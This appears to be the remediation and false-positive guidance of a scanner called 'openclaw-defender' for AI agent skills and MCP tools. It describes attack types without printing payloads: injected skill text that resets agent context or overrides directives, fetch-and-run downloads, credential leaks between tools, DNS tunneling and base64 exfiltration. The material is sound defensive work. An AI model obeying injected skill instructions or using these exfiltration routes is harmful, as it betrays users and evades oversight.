openclaw-defender

Remove the injection payload from the skill definition. Text that attempts to reset agent context or override prior directives is a direct attack vector.

Likely FP if the text is in a security tutorial or research paper discussing injection techniques as examples, not in an active skill description.

Download the file first, verify its integrity (checksum, signature), inspect it, then run it. Prefer package managers over raw downloads. Never fetch-and-run in one step.

Likely FP if the target is a well-known installer (e.g., rustup, Homebrew) from its canonical HTTPS domain, though the pattern is inherently risky.

Remove the injection payload from the skill definition. Text that attempts to reset agent context or override prior directives is a direct attack vector.

Likely FP if the text is in a security tutorial or research paper discussing injection techniques as examples, not in an active skill description.

Prevent credentials and sensitive data obtained by one MCP tool from being passed to other tools. Implement data isolation between tools and restrict cross-tool data flow for secrets.

Likely FP if the cross-tool data flow is intentional API authentication (e.g., a tool fetches an auth token that another tool uses for the same service).

Verify the authenticity of downloaded packages by checking GPG signatures or SHA-256 checksums against a trusted source. Do not rely solely on HTTPS for package integrity.

Likely FP if the package installation uses a well-known package manager (npm, pip) which already verifies package integrity by default.

Replace direct shell script execution with a language-native implementation or a sandboxed executor. If shell scripts must run, restrict them to a vetted allowlist with integrity checks.

Likely FP if the match references running a script that is part of the skill's own repository (e.g., ./setup.sh) with clear, auditable contents.

Validate cron expressions and scheduled commands against an allowlist. Ensure scheduled tasks cannot be modified by untrusted input and log all cron job changes.

Likely FP if the match is a documentation reference to crontab syntax or a short mention of cron in a description of scheduling concepts.

Replace direct shell script execution with a language-native implementation or a sandboxed executor. If shell scripts must run, restrict them to a vetted allowlist with integrity checks.

Likely FP if the match references running a script that is part of the skill's own repository (e.g., ./setup.sh) with clear, auditable contents.

Restrict DNS queries to legitimate resolution. Block the construction of DNS names that encode arbitrary data (DNS tunneling). Monitor for unusually long or high-entropy subdomains.

Likely FP if the match is a documentation reference to DNS lookup functionality for legitimate hostname resolution.

Block patterns that base64-encode data and immediately transmit it. If base64 encoding is needed, ensure the encoded data does not contain secrets and destinations are allowlisted.

Likely FP if base64 encoding is used for legitimate purposes like encoding images for display or constructing data URIs, with no network transmission.

Verify the integrity of downloaded binaries or archives using SHA-256 checksums or GPG signatures. Pin download URLs to specific versions and avoid fetching from unverified sources.

Likely FP if the download is from github.com or githubusercontent.com for a specific tagged release with documented checksums.